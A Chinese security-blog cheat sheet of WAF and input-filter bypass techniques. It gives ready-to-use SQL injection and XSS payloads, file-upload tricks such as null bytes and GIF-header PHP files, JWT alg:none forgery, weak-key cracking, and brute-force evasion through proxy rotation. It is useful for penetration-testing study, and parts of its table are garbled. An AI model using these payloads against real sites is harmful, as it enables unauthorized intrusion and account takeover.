2/64
网络安全为人民
师傅们好👋:本公众号现在已开启对常读和星标的公众号展示大图推送,为了不错过我们的网络安全干货,请星标🌟我们。这样,您就能快速掌握最新动态,与我们共同守护网络空间!感谢您的关注和支持!💖
一、WAF 绕过
1. 编码/混淆绕过
-
URL编码: %3Cscript%3E
→<script>
-
双重URL编码: %253Cscript%253E
→<script>
-
Unicode编码: u003cscriptu003e
→<script>
-
HTML实体编码: <script>
→<script>
-
Base64编码: PHNjcmlwdD4=
→<script>
2. 协议/注释分割
-
HTTP参数污染(HPP): ?id=1&id= UNION SELECT 1,2,3--
-
注释分割SQL语句: UNION/**/SELECT 1,2,3
-
换行符绕过: %0A
、%0D
分隔敏感关键词
3. 特殊字符干扰
-
NULL字节(%00): example.php%00.jpg
→ 欺骗文件类型检测 -
非常见空格符: %09
(Tab)、%0C
(换页符) -
大小写混合: UnIoN SeLeCt
→ 规避关键词过滤
二、输入过滤绕过
1. SQL注入绕过
|
|
|
---|---|---|
|
/**/
%0a 、() |
UNION/**/SELECT 1,2,3 |
|
|
id=0x27
id=%bf%27 |
UNION
|
|
(SELECT 1 FROM (SELECT 1)a) |
|
|
IF(1=1,SLEEP(5),0) |
2. XSS绕过
-
事件属性绕过: <img src=x onerror=alert(1)>
-
伪协议绕过SVG: <svg/onload=alert(1)>
-
大小写混淆: <ScRiPt>alert(1)</sCriPt>
-
编码上下文逃逸: <a href="javascript:%61lert(1)">
-
CSS表达式: <div style="color:expression(alert(1))">
3. 文件上传绕过
-
后缀名绕过: .php5
、.phtml
、.php%00.jpg
-
Content-Type篡改: image/jpeg
→ 实际传PHP文件 -
魔数伪造:添加GIF文件头 GIF89a; <?php [...] ?>
-
路径拼接漏洞: filename="test.php/."
三、认证/授权绕过
1. Cookie/JWT操纵
-
Cookie参数篡改: role=admin
→ 普通用户提权 -
JWT算法修改:篡改 alg:none
+ 移除签名 -
JWT密钥爆破:弱密钥(如 secret
、password
)
2. 暴力破解保护绕过
-
IP轮换:通过代理池规避IP封锁 -
延迟请求:降低请求频率至阈值以下 -
账号爆破:使用已知账号爆破密码(先枚举有效用户)
3. CSRF Token绕过
-
移除Token参数:尝试直接提交无Token的请求 -
Token固定值漏洞:分析是否与服务端验证逻辑无关 -
同域Token窃取:通过XSS获取Token
免责声明:
无尽藏攻防实验室(本文公众号)的技术文章仅供学习参考,禁止用于其他!!!未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。由于传播、利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,无尽藏攻防实验室及作者不为此承担任何责任。如有侵权烦请告知,我们会立即删文章除并致歉,感谢您的理解和支持!
使用前请遵守法律法规,使用本文章内容及POC等资源默认代表自愿遵守国家法律并由使用者本人承担一切法律后果。
原文始发于微信公众号(无尽藏攻防实验室):WAF的鱿鱼逃脱术指南
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论